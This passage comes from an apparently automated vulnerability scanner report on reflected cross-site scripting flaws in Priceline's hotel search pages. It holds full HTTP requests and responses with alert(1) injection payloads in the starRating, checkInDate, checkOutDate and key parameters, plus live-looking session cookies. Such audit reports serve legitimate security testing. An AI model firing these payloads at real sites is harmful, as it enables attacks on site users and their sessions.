Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:18 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5564010a20111003001218c8e011572625; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A12%3A18&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:12:18 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8925
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="session_key" value="711510AC721510AC20111003000909914181269334ad165"style="x:expression(alert(1))"b5f07388fd31c4bf1"/>
...[SNIP]...
4.143. http://travela.priceline.com/hotel/searchHotels.do [starRating parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the starRating request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6371a"style%3d"x%3aexpression(alert(1))"d300b6f357f325257 was submitted in the starRating parameter. This input was echoed as 6371a"style="x:expression(alert(1))"d300b6f357f325257 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-16371a"style%3d"x%3aexpression(alert(1))"d300b6f357f325257&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:17:30 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5564010a20111003001730c0e011714163; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A17%3A30&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:17:30 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8953
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="starRating" value="-16371a"style="x:expression(alert(1))"d300b6f357f325257"/>
...[SNIP]...
4.144. http://travela.priceline.com/hotel/searchHotels.do [starRating parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the starRating request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b77"style%3d"x%3aexpression(alert(1))"22c15fa7b0d was submitted in the starRating parameter. This input was echoed as f9b77"style="x:expression(alert(1))"22c15fa7b0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1f9b77"style%3d"x%3aexpression(alert(1))"22c15fa7b0d&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:43:34 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5064010a2011100300433400e011599071; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A43%3A34&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:43:34 GMT; Path=/
Set-Cookie: JSESSIONID=530B681A81D3E82EF77300F8F6A759C0; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8703
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="starRating" value="-1f9b77"style="x:expression(alert(1))"22c15fa7b0d"/>
...[SNIP]...
4.145. http://travela.priceline.com/hotel/searchHotels_process.do [checkInDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the checkInDate request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcfce"%3balert(1)//d87c20a00bf was submitted in the checkInDate parameter. This input was echoed as bcfce";alert(1)//d87c20a00bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /hotel/searchHotels_process.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 385
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A7DD4F28603939D582AC0D4191CEC727; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL

passingValues=YES&affiliateSubID=514A&checkInDate=bcfce"%3balert(1)//d87c20a00bf&hotelBrand=&checkOutDate=10%2F16%2F2011&refclickid=TRIP_HOTELSEARCH&cityName=bos&numberOfRooms=1&jsk=4663010a5564010a20111003003755e18011569968&searchType=CITY&plf=pclh&searchHotelName=&starRating=-1
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:51:53 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=A7E2B67ED1A3C415919522B4994E7029; Path=/hotel
Vary: Accept-Encoding
Content-Length: 298438
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
= "A";
c2c["gblPartnerCode"] = "PCLN";
c2c["productID"] = "5";
c2c["wtPageTitle"] = "/hotel/hotelResults_default";
c2c["numRooms"] = "1";
c2c["travelEndDate"] = "10/16/2011";
c2c["travelStartDate"] = "bcfce";alert(1)//d87c20a00bf";
c2c["vid"] = "v2011100300373188ec0127";


function c2cUpdateData(strKey, strValue){
   c2c[strKey] = strValue;
}

ATGSvcs.setUOID(200106297609);
</script>
...[SNIP]...
4.146. http://travela.priceline.com/hotel/searchHotels_process.do [checkInDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the checkInDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11670"style%3d"x%3aexpression(alert(1))"1aa8d5a4c6c was submitted in the checkInDate parameter. This input was echoed as 11670"style="x:expression(alert(1))"1aa8d5a4c6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /hotel/searchHotels_process.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 385
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A7DD4F28603939D582AC0D4191CEC727; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL

passingValues=YES&affiliateSubID=514A&checkInDate=11670"style%3d"x%3aexpression(alert(1))"1aa8d5a4c6c&hotelBrand=&checkOutDate=10%2F16%2F2011&refclickid=TRIP_HOTELSEARCH&cityName=bos&numberOfRooms=1&jsk=4663010a5564010a20111003003755e18011569968&searchType=CITY&plf=pclh&searchHotelName=&starRating=-1
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:51:43 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Vary: Accept-Encoding
Content-Length: 298738
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<INPUT onkeydown="keyOutOfCalTextBox(event);" onfocus="focusCalTextBox(event, this);" maxLength="15" id="checkInDate" name="checkInDate" size="12" value="11670"style="x:expression(alert(1))"1aa8d5a4c6c" onchange="fmtCalBoxDate(this, '%m/%d/%Y');">
...[SNIP]...
4.147. http://travela.priceline.com/hotel/searchHotels_process.do [checkOutDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the checkOutDate request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16597"%3balert(1)//918d3a74d54 was submitted in the checkOutDate parameter. This input was echoed as 16597";alert(1)//918d3a74d54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=16597"%3balert(1)//918d3a74d54&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=1&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInYear=2011&plf=pcln&homepage=Y&CkOutDay=07&searchHot
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:28 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=9B81E2B82836B27C1F2948661BC0EF08; Path=/hotel
Vary: Accept-Encoding
Content-Length: 298494
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
] = "HOTELSEARCH";
c2c["serverDomain"] = "A";
c2c["gblPartnerCode"] = "PCLN";
c2c["productID"] = "5";
c2c["wtPageTitle"] = "/hotel/hotelResults_default";
c2c["numRooms"] = "1";
c2c["travelEndDate"] = "16597";alert(1)//918d3a74d54";
c2c["travelStartDate"] = "10/04/2011";
c2c["vid"] = "v2011100300090989417126";


function c2cUpdateData(strKey, strValue){
   c2c[strKey] = strValue;
}

ATGSvcs.setUOID(200106297609);
</script>
...[SNIP]...
4.148. http://travela.priceline.com/hotel/searchHotels_process.do [checkOutDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the checkOutDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df5ec"style%3d"x%3aexpression(alert(1))"00e29997f67 was submitted in the checkOutDate parameter. This input was echoed as df5ec"style="x:expression(alert(1))"00e29997f67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=df5ec"style%3d"x%3aexpression(alert(1))"00e29997f67&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=1&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInYear=2011&plf=pcln&homepage=Y&CkOutDay=07&searchHot
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:17 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=D74CAC1CB0F684F7A50FF3C7A87EFE5A; Path=/hotel
Vary: Accept-Encoding
Content-Length: 298794
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<INPUT onkeydown="keyOutOfCalTextBox(event);" onfocus="focusCalTextBox(event, this);" maxLength="15" id="checkOutDate" name="checkOutDate" size="12" value="df5ec"style="x:expression(alert(1))"00e29997f67" onchange="fmtCalBoxDate(this, '%m/%d/%Y');">
...[SNIP]...
4.149. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the key request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0c98"%3balert(1)//acb6c7dcc1f was submitted in the key parameter. This input was echoed as b0c98";alert(1)//acb6c7dcc1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=10%2F07%2F11&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=1&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInY
...[SNIP]...
